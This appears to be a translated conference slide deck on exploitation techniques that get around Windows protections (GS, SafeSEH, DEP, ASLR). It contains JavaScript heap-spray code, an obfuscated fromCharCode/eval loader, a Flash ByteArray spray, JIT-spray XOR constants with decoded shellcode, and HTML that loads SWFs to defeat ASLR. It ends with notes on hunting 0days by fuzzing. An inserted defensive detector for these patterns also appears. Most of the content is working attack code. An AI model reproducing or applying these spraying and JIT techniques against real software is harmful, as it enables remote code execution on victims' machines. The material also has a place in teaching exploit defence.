Nanika naninb@gmail.com
Magic
Thurston's three principles of magic:
Never reveal what you are about to perform before the performance.
Never perform the same trick twice for the same audience at the same time and place.
After the performance, never reveal the secret to the audience.
Windows exploit mitigation mechanisms: /GS, SafeSEH, DEP, ASLR
Breakthrough
Breaking down the magic tricks
General vulnerability exploitation
Fish: scope of application
Requirements for a successful magic trick
Technique (exploitation)
Why spraying?
Not controlled precisely
Not controlled at all
Universal

NOP-equivalent fill values:
0x0c0c0c0c  OR AL,0C
0x0d0d0d0d  OR EAX,0D0D0D0D
0x0a0a0a0a  OR CL,BYTE PTR DS:[EDX]
0x0b0b0b0b  OR ECX,DWORD PTR DS:[EBX]
0x0c0b0c0b  OR AL,0B
0x14141414  ADC AL,14

Not controlled precisely: esi=0x41414141
mov eax,esi
mov ecx,[eax]
call [ecx+0x8]
Offset 0x10  MEM 0x01140000  AAAAAAAAAAAAAAAA
Offset 0x20  MEM 0x01140010  BBBBBBBBBBBBBBBBB
Fill bytes: 0a 0b 0c 0d

Not controlled: esi=0x0c374512 (not under our control)
mov eax,esi
mov ecx,[eax]   //no access
call [ecx+0x8]
0x0c374512
Fill bytes: 0b 0b 0c 0d

Universal
XP stack overflow:
0x0013ffac //cookie
0x0013ffb0 //ret
0x0013ffc0
0x0013ffe0 //seh
0x0013fff0
0x0014000 //no access
2000 stack overflow:
0x0013ffa0
0x0013ffbc //cookie
0x0013ffc0 //ret
0x0013ffe0
0x0013fff0 //seh
0x0014000 //no access
Classic JavaScript heap spraying
var heapspraytoaddress = 0x12202020;
//var payloadcode = unescape("%ue8fc%u0044..");
var heapblocksize = 0x100000;
var payloadsize = payloadcode.length * 2;
var sprayslidesize = heapblocksize - (payloadsize + 0x38);
var sprayslide = unescape("%u0c0c%u0c0c");
sprayslide = getsprayslide(sprayslide, sprayslidesize);
heapblocks = (heapspraytoaddress - 0x10C000) / heapblocksize;
memory = new Array();
for (i = 0; i < heapblocks; i++) { memory[i] = sprayslide + payloadcode; }
function getsprayslide(sprayslide, sprayslidesize) {
    while (sprayslide.length * 2 < sprayslidesize) { sprayslide += sprayslide; }
    sprayslide = sprayslide.substring(0, sprayslidesize / 2);
    return sprayslide;
}
JavaScript Encode
<html><body>
<button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button>
<script language="javascript">
var strtmp = String.fromCharCode(102,117,110,99,116,105,111,110,32,101,1 01,106,101,101,102,101,40,41,123,118,97,114,32,115,61,117,1 10,101,115,99,97,112,101,40,34,37,117,48,101,101,98,37,117, 52,98,53,98,37,117,99,57,51,51,37,117,102,54,98,49,37,117,51,52,56,48,37,117,101,101,48,98,37,117,102,97,101,50,37,117,4 8,53,101,98,37,117,101,100,101,56,37,117,102,102,102,102,37,117,48,55,102,102,37,117,101,101,52,97,37,117,101,101,101, 101,37,117,56,97,98,49,37,117,100,101,52,102,37,117,101,101,101,101,37,117,54,53,101,101,37,117,101,50,97,101,37,117,5 7,101,54,53,37,117,52,51,102,50,37,117,56,54,54,53,37,117,54,53,101,54,37,117,56,52,49,57,37,117,98,55,101,97,37,117,97, 97,48,54,37,117,101,101,101,101,37,117,48,99,101,101,37,117,56,54,49,55,37,117,56,48,56,49,37, );
var ee = eval;
ee(strtmp);
An old trick, but still worth bringing up.
Flash
Once antivirus software performs dynamic semantic analysis of JavaScript, the various encoding techniques usually cannot fool it; at best they fool the human analyst and increase the time analysis takes.
Flash is extremely widespread: anyone with a browser installed has Flash installed too.
Most of what JavaScript can do, Flash can do as well.

The biggest headache for defenders today:
There is nothing that cannot be defended against.
What you do not know about cannot be defended against.
The things that straddle the line between good and bad.
Flash spraying
public function MainTimeline() {
    addFrameScript(0, frame1);
    return;
} // end function
function frame1() {
    shellcode = new ByteArray();
    shellcode.writeByte(144);
    b = "\f\f\f\f";
    a = "\x0d\x0d\x0d\x0d";
    while (b.length < 1048576 - (shellcode.length + 64)) // 2097152) // 1048576)
    {
        b = b + a;
    }
    bytearr = new ByteArray();
    gy = new ByteArray();
    gy.writeMultiByte(b, "iso-8859-1");
    bytearr.writeMultiByte(gy, "iso-8859-1");
    bytearr.writeBytes(shellcode, 0, shellcode.length);
    gy1 = new ByteArray();
    gy1.writeBytes(bytearr, 0, bytearr.length);
    gy2 = new ByteArray();
    gy2.writeBytes(bytearr, 0, bytearr.length);
    return;
}

Why not to do this?
var c = 0;
var gy1:Array = new Array();
while (c < 128) // 2097152) // 1048576)
{
    gy1[c] = new ByteArray();
    gy1[c].writeBytes(bytearr, 0, bytearr.length);
    c = c + 1;
}

Flash spraying cannot bypass DEP.
JIT (BlackHat DC 2010)
var y = (0x11223344 ^ 0x44332211 ^ 0x44332211);
Decoded from 0x909090:
0x909090: 35 44332211    XOR EAX, 11223344
0x909095: 35 44332211    XOR EAX, 11223344
0x90909A: 35 44332211    XOR EAX, 11223344
Decoded from 0x909091:
0x909091: 44             INC ESP
0x909092: 3322           XOR ESP,[EDX]
0x909094: 1135 44332211  ADC [11223344],ESI
0x90909A: 35 44332211    XOR EAX, 11223344

var ret = (0x3c909090 ^ 0x3c909090 ^ 0x3c909090 ^ 0x3c909090 ^ );
Decoded from 0x1A1A0100:
0x1A1A0100: 359090903C  XOR EAX, 3C909090
0x1A1A0105: 359090903C  XOR EAX, 3C909090
0x1A1A010A: 359090903C  XOR EAX, 3C909090
0x1A1A010F: 359090903C  XOR EAX, 3C909090
Decoded from 0x1A1A0101:
0x1A1A0101: 90    NOP
0x1A1A0102: 90    NOP
0x1A1A0103: 90    NOP
0x1A1A0104: 3C35  CMP AL, 35
0x1A1A0106: 90    NOP
0x1A1A0107: 90    NOP
0x1A1A0108: 90    NOP
0x1A1A0109: 3C35  CMP AL, 35
JIT shellcode
mov edi, 0x7946c61b
mov al,0x1b
push al
CMP AL,0x35
inc esp
inc esp
inc esp
CMP AL,0x35
inc esp
inc esp
NOP
CMP AL,0x35
mov al,0xc6
push al
CMP AL,0x35
inc esp
inc esp
inc esp
CMP AL,0x35
inc esp
inc esp
NOP
CMP AL,0x35
mov al,0x46
push al
CMP AL,0x35

0347006A D9D0   FNOP
0347006C 54     PUSH ESP
0347006D 3C 35  CMP AL,35
0347006F 58     POP EAX
03470070 90     NOP
03470071 90     NOP
03470072 3C 35  CMP AL,35
03470074 6A F4  PUSH -0C
03470076 59     POP ECX
03470077 3C 35  CMP AL,35
03470079 01C8   ADD EAX,ECX
0347007B 90     NOP
0347007C 3C 35  CMP AL,35
0347007E D930   FSTENV DS:[EAX]

0x1A1A0110: 803F6E  CMP [EDI], 'n'
0x1A1A0113: 6A35    PUSH 35
0x1A1A0115: 75EF    short jnz

Decoder flow
0x1A1A0101: Decoder
0x1A1A0102: Decoder
0x1A1A0103: Decoder
0x1A1A0104: 3C35 CMP AL, 35
0x1A1A0106: Decoder
0x1A1A0107: Decoder
0x1A1A0108: Decoder
0x1A1A0109: 3C35 CMP AL, 35
0x1A1A010A: Magic
0x1A1A010B: Magic
0x1A1A010C: Magic
0x1A1A010D: 3C35 CMP AL, 35
0x1A1A010E: Encoded shellcode
0x1A1A010E: Encoded shellcode
0x1A1A010E: Encoded shellcode
0x1A1A010D: 3C35 CMP AL, 35
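As an added example (not code from the deck or its author), the defender's counterpart to the script patterns shown above: a static triage heuristic that flags the classic unescape() spray filled with one of the deck's NOP-equivalent words, the String.fromCharCode()+eval() encoding, and the repeated-constant XOR chains of JIT spraying. The sample scripts, the rule names and the scoring convention are constructed for this example.

```javascript
// Added example: static triage of script text for the deck's three spray/encode
// patterns. Fill words come from the deck's NOP table; the rules and scores are
// a convention constructed here, not a real scanner's ruleset. Pair with dynamic
// analysis in practice, since encoding tricks exist precisely to defeat static rules.
const NOP_FILL_WORDS = new Set(["0c0c", "0d0d", "0a0a", "0b0b", "0c0b", "1414"]);

function analyzeScript(src) {
  const findings = [];
  // 1. unescape("%uXXXX%uXXXX...") where every word is the same NOP-equivalent value.
  const fillRe = /unescape\("((?:%u[0-9a-f]{4})+)"\)/gi;
  let m;
  while ((m = fillRe.exec(src)) !== null) {
    const words = m[1].toLowerCase().match(/%u([0-9a-f]{4})/g).map(w => w.slice(2));
    const uniform = words.length >= 2 && words.every(w => w === words[0]);
    if (uniform && NOP_FILL_WORDS.has(words[0])) {
      findings.push(`nop-sled fill 0x${words[0]}${words[0]}`);
    }
  }
  // 2. A `new Array()` filled inside a for loop by string concatenation (the spray loop).
  const loopFillRe = /for\s*\([^)]*\)\s*\{[^}]*\[\s*\w+\s*\]\s*=[^}]*\+/;
  if (/new\s+Array\s*\(\s*\)/.test(src) && loopFillRe.test(src)) {
    findings.push("array filled in a loop with concatenated strings");
  }
  // 3. Source text built with String.fromCharCode() and handed to eval (or an alias of it).
  if (/String\.fromCharCode\s*\(/.test(src) && /\beval\b/.test(src)) {
    findings.push("fromCharCode-built string reaches eval");
  }
  // 4. The same 8-hex-digit constant XORed with itself four or more times in one expression.
  if (/0x([0-9a-f]{8})(?:\s*\^\s*0x\1){3,}/i.test(src)) {
    findings.push("repeated-constant XOR chain");
  }
  return { score: findings.length, findings };
}

// Constructed samples modelled on the deck's snippets (shortened; no payload included).
const SAMPLES = {
  classicSpray: 'var sprayslide = unescape("%u0c0c%u0c0c"); memory = new Array(); ' +
                'for (i = 0; i < heapblocks; i++) { memory[i] = sprayslide + payloadcode; }',
  encoded: 'var strtmp = String.fromCharCode(102,117,110,99); var ee = eval; ee(strtmp);',
  jitChain: 'var ret = (0x3c909090^0x3c909090^0x3c909090^0x3c909090);',
  benign: 'var s = unescape("%u0041"); document.title = s + " page";',
};

for (const [name, src] of Object.entries(SAMPLES)) {
  const r = analyzeScript(src);
  console.log(`${name}: score ${r.score}`, r.findings);
}
```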
ASLR (Address Space Layout Randomization)

JIT Spraying (1)
function pageloadex() {
    var ldr = new Loader();
    var url = "jit_s0.swf";
    var urlreq = new URLRequest(url);
    ldr.load(urlreq);
    childref = addChild(ldr);
}
function pageload() {
    for (var z = 0; z < 2400; z++) { pageloadex(); }
}
function Loadzz1() {
    Security.allowDomain("*");
    pageload();
}
WinXP Vista Win7 32
Bypass ASLR 33
JIT Spraying (2)
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
        codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0"
        width="0" height="0" id="myflash">
  <param name="movie" value="bb.swf">
  <param name="quality" value="high">
  <param name="fullscreen" value="true">
  <param name="scale" value="exactfit">
  <embed src="bb.swf" quality="high"
         pluginspage="http://www.macromedia.com/go/getflashplayer"
         type="application/x-shockwave-flash" width="800" height="600">
  </embed>
</object>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
        codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0"
        width="0" height="0" id="myflash">
  <param name="movie" value="bb2.swf">
  <param name="quality" value="high">
  <param name="fullscreen" value="true">
  <param name="scale" value="exactfit">
  <embed src="bb2.swf" quality="high"
         pluginspage="http://www.macromedia.com/go/getflashplayer"
         type="application/x-shockwave-flash" width="800" height="600">
  </embed>
</object>
WinXP & Vista 35
WinXP 36
Vista 37
PDF & Flash
Acrobat 9.2 enables DEP by default.
Acrobat supports Flash by default.
Adobe's advice: turn off JavaScript in PDF Reader.

WinXP: PDF & one big Flash
WinXP Vista Win7 40
Include Flash 41
Creation (finding new magic: 0day)

0day
Find them yourself.
Wait for someone to send you one.
Receive one and not even realise it.
What is a 0day? Can you eat it?

First-class people create opportunities.
Second-class people discover opportunities.
Third-class people wait for opportunities.
Fourth-class people miss opportunities.
Which class are you?

How to look for 0day: test, test, test, and keep testing. Heaven looks after the fool who keeps at it.

http://rootkit.tw/blog/?p=173 0x66->0x40

Collect a large number of samples (this requires a lot of machine resources).
Feed the samples into testing.
Let them run on their own.
Check the reports at regular intervals.

Who is doing automated vulnerability testing?
MS: O
Security researchers: O
Antivirus vendors: ?
Underground hackers: O
Governments: ?
Software vendors: ?????

You reap what you sow. Don't sit around waiting for luck; your security is best in your own hands.
If you are interested in joining or sponsoring the automated vulnerability-testing project, write to naninb@gmail.com
Thank you Q & A